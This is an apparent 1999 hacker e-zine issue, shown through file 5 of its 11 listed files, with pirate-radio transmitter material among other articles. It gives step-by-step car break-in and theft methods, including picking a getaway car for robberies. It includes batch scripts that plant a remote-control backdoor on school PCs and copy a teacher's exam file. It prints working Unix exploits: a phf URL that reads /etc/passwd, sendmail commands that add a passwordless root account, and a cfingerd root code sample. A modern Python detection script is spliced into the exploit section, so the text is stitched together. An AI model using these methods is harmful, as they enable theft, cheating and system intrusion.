:..:..:..:..:..:..:..:..:
:UNDERGROUND::PERIODICAL:
:..:..:..:..:..:..:..:..:
"We're on the Up and Up"

:..:..::..Issue..::..:..:
Issue 2, April 1999

:..:..::..Editor.::..:..:
Cyborg

:.::.::.:.Staff.:.::.::.:
Cyborg
HitMan
CrossFire

:.::..Shouts Outs To.::.:
G_H, fORCE, ManiC, ZirQaz, DemonR, Freeman, Sunburst, Hellbent, LordPhaxx

:..::..:.Website.:..::..:
http://upzine.8m.com

:..::..:..E-mail.:..::..:
under_p@yahoo.com

:.::...Distributors..::.:
t245.dccnet.com:95001
http://cyborg.ie.8m.com
http://hitman.ie.8m.com
http://www.newbiehack.8m.com

:..::..Introduction.::..:

<*> Welcome to the second and thus latest, greatest issue of Underground Periodical. Well, not dead yet, as it seems. The counter on our website indicates that there are about 600 readers. What is needed most now are file submissions and suggestions on how to improve it. Some people have been complaining that they can't download Up1-00.zip from the website, so take note that there are already a few distributors. I urge you to send us something to use, as you will get to plug your site at the end.

<*> Due to the high demand we have started up a subscription list. To join it just go to the bottom of our website and enter your e-mail in the dialog box to sign up. Issues will now be e-mailed to you every month. It will appear in digest form as a mailing list; only the .zip file will come attached. The list is powered by ListBot, so what are you waiting for? Go sign up now.

<*> Issue 1 of Up was reviewed by Anti-Social magazine this month in their twelfth issue, so download it at http://www.antisocial.cjb.net This is very important, as it will provide the much needed constructive criticism to help us improve for next month and beyond.
It might also help to spread the URL around for the website so that more people will download the issues, thus increasing our fan base.

<*> Underground Periodical is written by its readers. Without you, we the staff, the fancy ASCII art, it all means nothing. You are the ones who write the magazine. What we need to get started is submissions, so send us in your text files. We accept technical information, philosophy on the state of the scene today, and articles on free speech and censorship; we are interested in all innovations of computer culture, although we are mostly based on underground stuff. Send your articles in text format to the e-mail address at the top.

<*> Tell your friends!!! Tell your pals on mailing lists and IRC channels about the Periodical. We post our existence to a few newsgroups but it just isn't enough. We can't be everywhere at once, so advertise us to your greatest mates. If you were doing an e-zine I'd help you out.

<*> We'd like to thank any and all people who submitted to Issue 2 or contributed in any way. It is understood that they are automatically included as Shout Outs. Without continued support from the underground community we won't be able to keep Up going. It's your magazine, so help it out a little. Anyway, on with this issue...

:..::.:..Contents.:.::..:
<*> 1 - Introduction & Contents : Cyborg
<*> 2 - Breaking Into Cars : Franco
<*> 3 - Total Control : GPF#2
<*> 4 - Pirate Radio Series : Cyborg
<*> 5 - Unix Security Holes : CrossFire
<*> 6 - Bouncing your IP : Cyborg
<*> 7 - Breaking Accounts : HitMan
<*> 8 - Cracking Passwd Files : Cyborg
<*> 9 - Meridian Mail Tips : CFish
<*> 10 - Letters\Feedback : Readers
<*> 11 - Disclaimer & The End : Up Staff

:..::..End Of File..::..:

:..::..File 2 Of 11.::..:
:...Breaking Into Cars..:
:..::...By Franco...::..:

<*> Breaking into cars for fun, profit as well as for stealing 'em.
The purpose of this file is to educate people about the security flaws associated with car-related features (alarms, immobilisers, locks, etc.). Now let me begin by getting a few things straight. If you're the kind of person who's going to do this thinking they're the man when drunk out of their skull, then forget it, as you have as much hope of getting away with it as you stand of not falling asleep the second you sit in the car. Trust me, friends of friends have done this so many times and got nicked so many times that it's not even funny anymore! I'm serious, practice and maturity are essential!!!

There are many approaches to gaining access to a car, but it also depends whether you're stealing the contents (radio, mobile phone etc.) or stealing the car itself. If you're simply breaking into the car to steal the contents then you've got tons of options.

(a) Smashing the window
(b) Picking the locks

(a) Now this must be the crudest of all methods of gaining access to a car. Use a stone, screwdriver, yourself, or whatever the hell you like. After this it's kind of self explanatory... if stealing the contents.

<*>-----------------------------------------------------------------<*>
TIP
When breaking the glass, a good idea would be to use sticky tape (preferably carpet tape). This is always a good idea as it quietens the sound of the glass breaking and practically no glass splinters will cover the seat or floor, so that when you sit down you don't end up with a bloody arse.
<*>-----------------------------------------------------------------<*>

(b) Now as there are so many options I'm gonna break it into sections.

*** Section 1

If you're trying not to damage the lock (to the naked eye) and you just want to steal the contents to freak the owner out, well here goes...

Approaches...
(i) pick set
(ii) electric pick gun or
(iii) screwdriver and coat hanger (or "Slim Jim") methods.
(i) If you're an unskilled bastard with no patience then go past this bit and see (ii) and (iii).

The idea behind using a pick set is to turn the various metal slides, which in turn pops the lock pull bit up (see below for a pitiful diagram).

[diagram: the lock pull bit, the bit that shoots up inside the car, shown above the glass divide and the rubber strip on the outside]

You can use various types of files, professional ones (a bit fucking expensive!) or make your own (see bottom of page for addresses of suppliers). If making your own then see yet again another pitiful diagram and follow the simple instructions...

Materials: Irregular sized paper clip or strips of easily bendable metal (easy to cut is a big advantage).

If using the paper clip, bend the paper clip so that it is in a completely straight line and bend one end so that it forms a small hook to help catch the metal slides in the lock (see diagram below).

[diagram: the straightened clip with the hook at one end]

Once you've done this you will be the proud owner of a simple but effective pick, HORAAAAAAA.

IN USE: Insert the pick into the lock and attempt to hook it behind one of the moving parts, then with a "SERIOUSLY FIRM" grip, pull the pick towards you using a pair of pliers. The idea being that the force applied is so great that instead of the pick simply shooting out, on its way out it manages to slip the moving parts, which as you've probably guessed opens the lock. This will take some practice and indeed a great deal of time. Also the chances of you opening the lock are only as good as the build of your pick.

If using the bendable metal, get a close up shot from either the internet or a catalog of a professional pick set. The picture must be a close up, as you need to be able to distinguish and size the various shapes for when it comes to actually making the picks. Simply "copy carve" the picks and there you have it, an inexpensive professional pick set.
IN USE: You firstly insert one pick, one that would allow a second to be inserted at the same time, and position them so that each makes contact with the moving parts in the lock so that you can apply sufficient leverage and in turn hopefully pop the lock. Before you think you can, go fuck if you think I'm gonna spend half an hour drawing another bloody diagram. As this is one of the most skill-demanding approaches, I advise much practice, and don't be discouraged easily.

<*>-----------------------------------------------------------------<*>
TIP
A good way to improve your lock picking skills is to practice them... where? I've always found the scrap yards a fantastic practice site. Simply find yourself a car of your own personal preference and work away at the lock. The beauty is that if you're asked what you're doing you can say you're trying to open the door to get a part from the inside. As well as this, if you have your eye on a particular car you want to steal or break into, you can go to the scrap yard and examine its locks in the knowledge that you won't be stopped and that you can't be arrested for doing it either.
<*>-----------------------------------------------------------------<*>

(ii) This is by far the easiest of ways to open the lock, though... but this is the hideous downer, the price: expect to pay upwards of £120.

[diagram: an electric pick gun, with its handle and the needle that goes into the lock]

If you're "NOT" like me and can afford one then I recommend one, as with the minimalist of practice you can be successful practically every time even when working with many new cars.
The basic principle, if you don't know, is that the file you insert into the lock vibrates when you turn on the gun and in most cases it will temporarily unlock the locking mechanism, and if you're quick enough you will be able to open the door before the gun vibrates the lock back to the closed position. Many private detectives and members of the government use them because of the fact that they leave little if any scratch marks and are easy and quick to operate, but they're not too concealed so don't get caught. You try explaining.

Or if you want the car for a job (off licence or post office job). If this is the case you're gonna want to have the car looking as inconspicuous as possible, and that means no missing windows and no weird looking locks. First off a good idea is to get something reliable (trust me, it may seem stupid, but so many jobs have gone arse ways when the getaway car conks out on them); remember, a getaway car is as essential to the job as your dick is for fucking with! Volkswagens and Mercedes are among the best, though if getting one, get an oldish one (4-8 years, no flash GTI or E-500s). The way in which you would go about opening the lock would in many cases be the pick or screwdriver approach (see aforementioned sections). Near the end of the page is a list of cars (with methods) which are simple to pick open and steal.

(iii) At this point you're probably wondering where my mention of the humble Slim Jim is. Well, wait no longer for I have prevailed. The Slim Jim (of American origin) has been around for countless years, okay fine, 30-40 years in one form or another (i.e. coat hanger). The Slim Jim is really a more refined rich man's coat hanger, though the coat hanger has one undeniable advantage: it can be bent away so you don't have to wear a long trench coat. If anyone knows or has details about a fold away Slim Jim then please e-mail me at crops@indigo.ie or at potmand@hotmail.com.
The basic principle behind them is very crude, and measures by manufacturers to hamper their use are now commonplace in cars under 3-4 years old (depends on the manufacturer... well duhh!!!). Back to the point: the principle is that the hook or catch part, when inserted between the window and rubber seal and pushed down far enough, latches on to the pop up lock cord and usually with an upward movement "pops the lock", and voila. Recently, reinforced Jims have been made to cope with motor corps such as Ford and G.M. to help counteract their counter actions (try saying that 15 times with 10 sour balls in your mouth).

The screwdriver approach is really easy and with practice can be used to open locks whilst leaving behind little external damage (perfect for the careful car thief). The idea is again quite simple... all that has to be done is that you get a set of screwdrivers (don't go buying the most expensive, though don't buy ones which will bend easily), pick out one you think best for the lock and shove it in and turn. Like I said, extremely easy. It's always a good idea to use a screwdriver which has a longish screw bit which is also thin so that you can get some depth when working on the lock.

*** Section 2

If you don't care a toss about the appearance of the car then do what the hell you like to open the door. What more were you expecting?

Approaches...
(i) easy to steal cars
(ii) locksmith contacts

<*>-----------------------------------------------------------------<*>
TIP
A good way of gaining entry to a car is through the boot lock, the reason being that especially on oldish and old cars the manufacturers use lesser locks and therefore make it very easy for thieving. I've used kitchen knives on these locks before and 75% of the time I've got in. This is one of the easiest methods of getting into cars!
<*>-----------------------------------------------------------------<*>

(i) Cars which are easy to steal...
Morris Minor (any type): opens with an ordinary Ford key (15-20 years) or house key.
Fiats (aged 12-25): opens again by a similar approach.
Fords (aged 10-25): opens with a Ford key of the period, or a similar key.
Volkswagens aren't reputed for being easy to steal, the new ones anyway, but I feel I have to give them a mention because they are by far more reliable and start in every weather condition time and time again and are ideal. Volks (aged 7-82) open best with the simple screwdriver approach. Remember, don't damage the lock externally if on a job. My preference would be a Golf.

(ii) Contacts

American Locksmith Service
P.O. Box 26
Culver City, CA 90230
ALS offers a new and improved Slim Jim that is 30 inches long and 3/4 inches wide, so it will both reach and slip through the new car lock covers (inside the door). Price is $5.75 plus $2.00 postage and handling.

Lock Technology Corporation
685 Main St.
New Rochelle, NY 10801
LTC offers a cute little tool that will easily remove the lock cylinder without harm to the vehicle, and will allow you to enter and/or start the vehicle. The GMC-40 sells for $56.00 plus $2.00 for postage and handling.

Steck MFG Corporation
1319 W. Stewart St.
Dayton, OH 45408
For $29.95 one can purchase a complete set of six carbon lockout tools that will open more than 95% of all the cars around.

Veehof Supply
Box 361
Storm Lake, IO 50588
VS sells tryout keys for most cars (tryout keys are used since there is no one master key for any one make of car, but there are group type masters, a.k.a. tryout keys). Prices average about $20.00 a set.

:..::..End Of File..::..:

:..::..File 3 Of 11.::..:
:.::..Total Control..::.:
:..::.:..By GPF#2.:.::..:

<*> Total Control - A Project For Your School Network

Here I'll tell ya how to get what looks like total control over PCs on a Windows LAN with low security. It can be pretty funny, and can really freak out your friends and stuff!
Things you need are: write access to a network drive, and physical access to the target computers. So here's what you do:

When you are going in to typing class or whatever, start up Notepad, and type in this:

    @echo off
    echo Logging in to network drive .....
    :start
    if exist h:\mydir\1.bat goto run
    goto start
    :run
    call h:\mydir\1.bat
    del h:\mydir\1.bat
    goto start

Instead of "h:\mydir", change it to a server directory that you have write access to. Save the file as c:\target.bat. Then add a shortcut in the startup group that runs the command "Start /m c:\target.bat". Then the next day, sit at a different computer, and type the same thing except typing in "2.bat" instead of "1.bat". You can continue this process until you have all your targets set up. This way, you get individual control over each of the victim machines.

Now you have to write the controlling file. It's fairly long so I have typed it out in full here for you. It is only a rough draft so mess about with it as much as you like.

<*>--------------------------< Distrib.bat >------------------------<*>
@echo off
if a%1==a goto noparam
if a%2==a goto noparam
if %1==/? goto noparam
if not exist %1 goto nofile
if not exist %2\nul goto nodir
set srcfile=%1
set distdir=%2
shift
shift
:dodist
copy %srcfile% %distdir%\%1.bat
if a%2==a goto quit
shift
goto dodist
:noparam
echo -----====[ Total Control ]====-----
echo By GPF#2
echo.
echo USAGE:
echo distrib file directory number number number ....
echo.
echo EXAMPLE:
echo Distribute cntrl.txt to computers 2, 6, 4, 9, 11, 41, and 21
echo Using n:\log as the directory to write to:
echo distrib cntrl.txt n:\log 2 6 4 9 11 40 21
goto quit
:nofile
echo Error - Input file unfound. Type distrib /? for usage
goto quit
:nodir
echo Error - Distribution directory does not exist.
echo Type distrib /? for usage
goto quit
:quit
<*>--------------------------< Distrib.bat >------------------------<*>

So select all of the text between the markers, and copy it to your clipboard.
Then paste it into Notepad, and save it onto a disk as Distrib.bat. This batch file is the one you will need to run every time you want to control a PC, so take care of it! It gives you some info on how to use it if you type distrib /?.

If you have followed all the steps in this file, you are nearly finished. What is left now is to decide what you actually want the other PCs to do, and how to do it. A really simple one is this:

1. Start up Notepad.
2. Type in this:
       echo I CAN SEE YOU>c:\temporary.txt
       notepad c:\temporary.txt
3. Save the file as c:\IcanCU.txt
4. At the MS-DOS prompt type: "a:\distrib.bat c:\IcanCU.txt h:\mydir 1 3 4 5 7"
5. Sit back, and watch the message "I CAN SEE YOU" displayed on target number 1, number 3, 4, 5, and number 7.
6. Don't burst your hole laughing, because they'll know it was you, and you'll be busted!

So step 2 is the main work done by your program. This can obviously be customised to do a lot more than just display something in Notepad. Step 4 uses Distrib.bat to send the messages to the server. So instead of "h:\mydir", type the directory that the victims are set to use. Also in step 4, try to use the MS-DOS prompt. This will work from the "Run" box on the start menu, but in the MS-DOS prompt each command is not recorded. When the messages start appearing onscreen, there will be plenty of distractions for you to smuggle your floppy out of its drive. Delete the file c:\IcanCU.txt while you are at the DOS prompt also. That's the command "del c:\IcanCU.txt" for all you Win'95 people.

Actually, I just thought of something you could do for Step 2: Suppose a teacher was writing your summer test, and was saving it as c:\windows\test.doc in MS Word. You could send their machine the command:

    copy c:\windows\test.doc h:\mydir

This would copy the file to the server, ready for your retrieval! Good luck, and have fun.
I did ;-)

[ASCII art signature: General Protection Fault]
-----Digital Artist-----
-----http://members.xoom.com/GPF2-----
-----GPF2@pmail.net-----

:..::..End Of File..::..:

:..::..File 4 Of 11.::..:
:..Pirate Radio Series..:
:..::...By Cyborg...::..:

<*> Pirate Radio Series Part II

Introduction:
This file deals with starting your own pirate radio station. It is part two of a four part series on pirate radio. I've researched many sites on the internet, combined with my own knowledge, to write this file.

Going On The Air - Transmitters

One of your most important and difficult investments will be the purchase of a transmitter. You could always build your own... but it is much easier and usually cheaper to purchase a transmitter. There are some safety guidelines that need to be followed when operating a transmitter. When you get your manual you would probably like to just skip the start and get down to some business. This can be lethal.

<*>-----------------------------------------------------------------<*>
TRANSMITTERS UTILISE LETHAL VOLTAGES!
NEVER OPERATE A TRANSMITTER WITH THE SAFETY DEVICES BYPASSED!
YOU COULD BE KILLED!
RF ENERGY LEAVES A DAMAGING BURN IF YOU MAKE "CONTACT"!
TREAT YOUR TRANSMITTER WITH RESPECT AND CAUTION OR IT MAY COST YOU YOUR LIFE!
<*>-----------------------------------------------------------------<*>

So what is a transmitter and what does it do? A transmitter is a device that converts AC or DC energy to RF energy. By itself, RF energy doesn't do you much good, so a transmitter also requires audio information to "modulate" the RF energy it generates. The modulated RF energy is coupled into an antenna to be dispersed into the ionosphere. Did you get all that? Good.
Have you ever heard of a Variable Frequency Oscillator? I didn't think so; it sounds like a device from the Starship Enterprise. This is the next step up from Crystal Control (this means you must supply a crystal cut or ground for a specific frequency to operate on that frequency). A transmitter that comes equipped with a VFO or can use an external VFO gives you freedom to operate on any frequency that it covers and where the transmitter is able to tune up. Most VFOs will cover the ham bands in 500 kHz segments and this can be utilised by the pirate to get outside the ham bands. It also allows for moving your frequency at a moment's notice.

By now, you might be familiar with some terms that describe types of modulation. Here is a quick guide:

* AM = Amplitude Modulation
* SSB = Single Side Band
* USB = Upper Side Band
* LSB = Lower Side Band
* DSB = Double Side Band
* FM = Frequency Modulation
* PM = Phase Modulation

In AM modulation, a carrier wave determines your frequency and 66% of your transmitter power is used here! The modulating signal, the audio info, is used to vary the amplitude of the carrier wave by means of upper and lower side bands. This is where the remaining 33% of the transmitter's power goes.

The range of audible frequencies to most people is 20 to 20,000 Hertz. In most amateur gear the audio bandwidth is restricted to 300 to 3,000 Hertz. If you wanted to be a real smart guy you could transmit on 2600 Hertz. This range is the best for projecting your voice signal. Now in AM mode combine 2.7 kHz for both upper and lower sidebands and you have an AM signal almost 6 kHz wide. If the frequency response of the transmitter was increased to 10 kHz, the resulting AM signal would be 20 kHz wide! You should now be starting to understand why commercial broadcasting stations reserve a wide berth.

Feeding your program audio into your transmitter properly can be a difficult and frustrating challenge!
To start with, a microphone level signal is typically high in impedance and quite small electrically. This is what the input circuits of your transmitter are expecting to see when you operate it in a voice mode. Now, the typical output level of a tape deck is medium in impedance and electrically much higher than a microphone signal. This is where the trouble starts. The way to tell if you are experiencing problems is that your transmitted signal will be under modulated, meaning you are not supplying a large enough signal, or the reverse will be true: your transmitted signal will be over modulated, meaning it will sound distorted, will be wide, and generally unlistenable. Take heart that both can be cured and all you need is a little knowledge! What you need is a matching network, more commonly known as a PAD, between your program audio and the Mic Input of your transmitter.

You must be selective when purchasing your transmitter. Here are some quick tips to help guide you:

* Read the fucking manual
When buying a transmitter the manuals are essential. Trying to find manuals for older pieces of gear can be a difficult and expensive task. These URLs provide a good stock:
http://eigen.net/w7fg/
http://www.sarrio.com/sarrio/rsfinal1.html

* Let your smell guide you
This may sound odd, but stick your face right down into the transmitter, POWER OFF! and take a big whiff. If it smells "burned" it would probably be wise to keep looking at other transmitters. Although you may be so embarrassed from sticking your face in that maybe you should just run out of the store.

* Need to know basis
Under NO circumstances should you inform the potential seller of a transmitter what you are going to be using it for! Just say something like you are studying for your ham licence. I doubt that they would be too interested in tuning into your illegal underground station anyway. Be careful what you say!

* Living conditions
Make sure you store your transmitter in a cool dry place.
The last thing you need is to let it get wet and die from an electric shock. Also, don't let it overheat; again, the current of electricity has no pity on you.

- Antennas

Antennas are probably one of the most debated, most studied and the cause of the most confusion of any field in radio. The antenna is the most important part of your station if properly constructed. For instance: Transmitter A runs 100 watts to an improper antenna and gets heard only marginally. Transmitter B runs 10 watts to a properly constructed, resonant antenna and gets heard much better and louder than Transmitter A. The quality of your antenna is a prediction of the quality of your whole station. It is crucial to have it in working order.

Perhaps the easiest and most popular antenna is a Dipole. The dipole antenna is easily constructed, almost impossible to mess up and works well at almost any height above ground. For the beginner, this is the antenna to use.

For your antenna to work well, you need to determine the frequency you are going to operate on. For example, we'll say 7445 kHz. To determine the length of wire our dipole antenna will need, we use the following formula:

    468 divided by Frequency in Megahertz = Length in Feet

So, working the math, 468 / 7.445 = 62.86 Feet. Round that off and we come to 62 Feet 10 Inches. This is the total length of the antenna. To make a dipole, cut two wires, each one 31 Feet 5 Inches long.

While not absolutely necessary, a Balun is recommended. For Dipole antennas that are fed with Coax line, a 1 to 1 Balun is suggested. A Balun matches a BALanced Line (your Dipole) to an UNbalanced Line (your Coax). This makes for an even greater transfer of power from the feedline to the antenna and will also prevent the ground shield of your Coax from becoming a radiator of RF! Baluns are a complex and difficult subject to fathom but there are books out that explain the How To's better than I could.
Just remember, a Balun is optional but is worth the trouble, and it is not that expensive to install one.

Another question you might be asking: "How high should I try to get my dipole?" My answer: as high as possible. If you live near hills or mountains then maybe you can set it up concealed next to a weather station. If that isn't possible then at least run it up the side of your house or apartment block. The higher, the better. Dipoles typically have the most favorable radiation patterns when they are 1 wavelength above ground. In the case of our 40 Meter Dipole, that comes to a whopping 125 Feet! I think it's safe to say that 99.99% of all 40 Meter Dipoles erected do not reach these heights.

The last consideration you need to think about is that of antenna orientation. A dipole will radiate the majority of power in lobes that are perpendicular to the axis of the dipole. What this means is, if you run your dipole North to South, then the majority of your RF signal will be radiated in an East to West pattern. So the geographical location of your transmitter and the location of your listeners will determine how you orient your antenna. You may also find that there are only one or two possible ways to place your dipole on your property; don't sweat it. Just hang it up and off you go.

Look out for Part III of this series where I will discuss operating tips and sharing the air with other radio people. Well, I hope this has been an informative read. If you would like to e-mail me regarding anything in this file then go ahead.
If you are interested in hacking, phreaking or programming then e-mail me or visit my website:
cyborg@disinfo.net
http://cyborg.ie.8m.com

:..::..End Of File..::..:

:..::..File 5 Of 11.::..:
:..Unix Security Holes..:
:.::...By CrossFire..::.:

<*> Introduction
----------------
Ok, for like a year now I have been going on about ethical hacking, and being the person fighting back and shit like that, so now I have decided to write something about Unix security holes, how they work, and how to fix them. Please note, this is intended as an article on how to fix security holes, not as a cookbook for budding uebercrackers.

The Famous PHF Hole
-------------------
The PHF hole is about the most well known security hole in the universe, although now you will be hard pushed to find a server that is vulnerable. This hole works because of the file phf.cgi that is in the cgi-bin directory of the Apache web server. The basic function of phf.cgi is to let a remote user execute arbitrary commands on the server machine; the most common of these is to view the password file.

How to use this hole
To test if your machine is vulnerable to this hole, go into a web browser and in the location bar type:

    http://www.yourdomain.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

If you are vulnerable to this hole, you will see something like:

    root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
    www-admin:rYsKMjnvRppro:100:11:WWW admin:/home/Common/WWW:/bin/csh

Otherwise you will see an error message saying that phf.cgi was not found on the server, or that you don't have permission to view phf.cgi on this server.

How to fix this hole
This is the obvious part. Off the top of my head, I can think of 2 ways to fix this on your server, these are: rm phf.cgi, or while root, chmod 700 /cgi-bin/phf.cgi (you must be in the root dir of the server to do this).
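Two checks a sysadmin would want for the holes in this file, as an added example that is not CrossFire's code or part of the zine: a scan of access-log lines for phf requests carrying the %0a newline that the PHF hole above turns into a shell command, and an audit plus the touch/chmod 600 pre-creation of dead.letter for the sendmail hard-link trick described in the next section. The log lines, paths and the scratch-directory scenario are all constructed; audit_dead_letter takes its passwd and tmpdir paths as arguments so it can be pointed at /etc/passwd and /var/tmp on a real host.

```python
import os
import re
import stat
import tempfile
from urllib.parse import unquote

# --- 1. Spotting PHF abuse in a web server access log -----------------------
# Constructed sample lines in Common Log Format (not taken from the zine).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Apr/1999:10:01:02 +0100] "GET /index.html HTTP/1.0" 200 1043
10.0.0.9 - - [12/Apr/1999:10:01:07 +0100] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 512
10.0.0.9 - - [12/Apr/1999:10:01:09 +0100] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 404 210
10.0.0.7 - - [12/Apr/1999:10:02:11 +0100] "GET /cgi-bin/test-cgi HTTP/1.0" 404 210
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3})')


def classify_phf(path):
    """Return (kind, detail) for a request to phf, or None for anything else."""
    if not path.lower().startswith("/cgi-bin/phf"):
        return None
    query = unquote(path.partition("?")[2])
    # The bug: a %0a (newline) in a form field ends the argument and the rest
    # of the line is handed to a shell.  Decode first, then look for it.
    if "\n" in query:
        return ("phf-command-injection", query.split("\n", 1)[1])
    return ("phf-probe", query)


def scan_access_log(text):
    """List every phf request; status 200 on an injection line means it worked."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify_phf(m.group("path"))
        if hit:
            findings.append({"ip": m.group("ip"), "status": int(m.group("status")),
                             "kind": hit[0], "detail": hit[1]})
    return findings


# --- 2. The dead.letter hard link ------------------------------------------
def same_inode(a, b):
    """True if a and b are two names for one file (a hard link), False otherwise."""
    try:
        sa, sb = os.stat(a), os.stat(b)
    except FileNotFoundError:
        return False
    return (sa.st_dev, sa.st_ino) == (sb.st_dev, sb.st_ino)


def audit_dead_letter(passwd, tmpdir):
    """Report the conditions the text lists: a link to passwd, same partition,
    a world-writable tmpdir, and whether a dead.letter already exists."""
    dead = os.path.join(tmpdir, "dead.letter")
    pw, tmp = os.stat(passwd), os.stat(tmpdir)
    return {"dead_letter_exists": os.path.exists(dead),
            "linked_to_passwd": same_inode(passwd, dead),
            "passwd_link_count": pw.st_nlink,   # >1 means another name points at passwd
            "same_filesystem": pw.st_dev == tmp.st_dev,
            "tmpdir_world_writable": bool(tmp.st_mode & stat.S_IWOTH)}


def harden_dead_letter(tmpdir):
    """The fix from the text: pre-create an empty dead.letter, mode 600.  Returns
    True if created, False if one already existed (it is left alone, as the text says)."""
    dead = os.path.join(tmpdir, "dead.letter")
    try:
        fd = os.open(dead, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    except FileExistsError:
        return False
    os.close(fd)
    os.chmod(dead, 0o600)   # enforce the mode regardless of umask
    return True


def dead_letter_demo():
    """Constructed scenario in a scratch directory standing in for / and /var/tmp."""
    with tempfile.TemporaryDirectory() as root:
        passwd = os.path.join(root, "passwd")
        with open(passwd, "w") as f:
            f.write("root:x:0:0:Operator:/:/bin/sh\n")   # constructed passwd line
        tmp = os.path.join(root, "tmp")
        os.mkdir(tmp)
        os.chmod(tmp, 0o1777)                             # sticky, world-writable
        os.link(passwd, os.path.join(tmp, "dead.letter")) # the attacker's ln
        before = audit_dead_letter(passwd, tmp)
        os.unlink(os.path.join(tmp, "dead.letter"))
        created = harden_dead_letter(tmp)
        created_again = harden_dead_letter(tmp)
        after = audit_dead_letter(passwd, tmp)
        mode = stat.S_IMODE(os.stat(os.path.join(tmp, "dead.letter")).st_mode)
        return {"before": before, "after": after, "created": created,
                "created_again": created_again, "mode": mode}


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
    print(dead_letter_demo())
```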
The Deadletter Exploit
----------------------
Deadletter Exploit for Sendmail 8.8.4
Version affected: 8.8.4

Ok, here's a brief and interesting explanation of this famous exploit. This exploit uses sendmail version 8.8.4 and it requires that you have a shell account on the server in question. The exploit creates a link from /etc/passwd to /var/tmp/dead.letter. Very simple really. Here's how it works; below are the exact commands as you have to type them.

    ln /etc/passwd /var/tmp/dead.letter
    telnet target.host 25
    helo
    mail from: frostiez@bah-bah.net
    rcpt to: masterbah@hotmail.com
    data
    frostiez::0:0:Mr Frostiez:/root:/bin/bash
    .
    quit

Then, when you're done, telnet to port 23 and log in as frostiez, no password required. Thanks to a little bit of work we did, frostiez just happens to have the same privileges as root.

There are a couple of reasons why this might not work:
1) /var and / are different partitions (as you already know, you can't make hard links between different partitions).
2) There is a postmaster account on the machine or a mail alias, in which case your mail will end up there instead of being written to /etc/passwd.
3) /var/tmp doesn't exist or isn't publicly writable.

How to fix this Hole
Log in as root on your system, then:

    cd /var/tmp
    ls -l

If there is a dead.letter already, you are safe. Don't delete that one. If there is NO dead.letter, type:

    touch dead.letter
    chmod 600 dead.letter

This will create a dead.letter of null length. Now it is impossible to hardlink /etc/passwd against /var/tmp/dead.letter. This exploit will not work any more.

AnswerBook2 Exploit - Solaris Only
----------------------------------
This exploit was blatantly nicked from a Sun security list, and is in letter form.

Hello,

already in December 1997 I discovered a serious bug in the AnswerBook2 server dwhttpd/3.1a4 that ships with Solaris 2.6 (server edition).
With a simple socket connection to the AB2 port (default: 8888), *anyone* on the network with access to that port (default: everybody, see below) can bring the server to spin and deny further responses:

- --- snip ---
HTTP/1.0 500 Server Error
Server: dwhttpd/3.1a4 (Inso; sun5)
[...]
The server currently lacks the resources needed to handle your request. Please try again later.
- --- snip ---

The affected dwhttpd process will eat one cpu, with possible impact on other services. (MP machines will still have some cpus available.)

I reported this to Sun who filed a bug report

bug/sherlock/server/4099376 HTTP 1.0 HEAD request brings the dwhttpd to spin

and assigned priority "fix within 3 months". AB2 technology is a third-party product, so Sun filed a bug with Inso who provides dwhttpd as part of their DynaWeb toolkit. Five months later (!) now they finally claim: It's fixed in dwhttpd/4.0 which will ship with Solaris 2.7. Still no patch for the existing AB2 package!

What you can do:

Q: Do I run dwhttpd?
A: Check for packages SUNWab2r, SUNWab2s and SUNWab2u.
   Check if dwhttpd is invoked at system startup (/etc/rc2.d/S96ab2mgr)
   Check with "ps -ef | grep dwhttpd"

Q: Is my AB2 server really vulnerable?
A: If you don't believe it, check yourself - the source code for a sample "AB2 DoS attack program" (that I gave Sun to reproduce the bug) is included in the bug report (wow - Sun publishes exploit scripts!).

Q: I'm vulnerable - what can I do?
A: 1. The only real fix is "/etc/init.d/ab2mgr stop" (which is a DoS itself :)
   2. Restrict the access to your AB2 server port to particular clients (e.g. intranet only) by tcp-wrapper or firewall setup.
   3. Get nervous, call Sun, request a patch for this bug now.

I hope we can get Sun/Inso to produce a *patch* soon. If there are any substantial news I will summarize again.
Best regards,
Thomas

CFingerd Exploit
----------------

(taken from rootshell)

SUMMARY
-------

I have found out that cfingerd 1.3.2 contains a security hole that could lead to easy root compromise for any user that has an account on the local machine, but only if ALLOW_EXECUTION is set in /etc/cfingerd/cfingerd.conf. By default, this option is DISABLED in Debian GNU/Linux.

DETAILS
-------

The ALLOW_EXECUTION option permits any user on the system to execute a program when their username is fingered. cfingerd needs to run as root but doesn't properly throw away root permissions when it starts up the user's script. When it is told to invoke /usr/bin/id from a user's script, it produces:

uid=0(root) gid=0(root) euid=65534(nobody) groups=0(root)

EXPLOIT
-------

Have it exec this:

#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setreuid(0, 0);          /* the real uid was left at 0, so the effective uid can be set back to root */
    system("/usr/bin/id");
    return 0;
}

Of course, system can exec any more devious command you choose -- ie, marking a shell setuid root, etc. (Can also be done with C calls.) No, I am NOT going to tell you how to make a setuid shell. If you don't know, you shouldn't be reading this.

To test the exploit, put something like this in ~/.project:

$exec /home/jgoerzen/test

and set ALLOW_EXECUTION to be enabled. This will give root for everything. Additionally, as you can tell, it fails to relinquish group permissions at all.

After applying the below fix, the new output is:

uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)

Much better!

FIX
---

Debian GNU/Linux comes with cfingerd, but in its default configuration, it is safe. For maximum security, please install the upgraded packages anyway. cfingerd greater than or equal to 1.3.2-11.0 will have the fix. I have uploaded the fixed packages to Incoming; before they propagate to the mirrors, you may find them at http://happy.cs.twsu.edu/~jgoerzen/cfingerd/ along with the new sources.
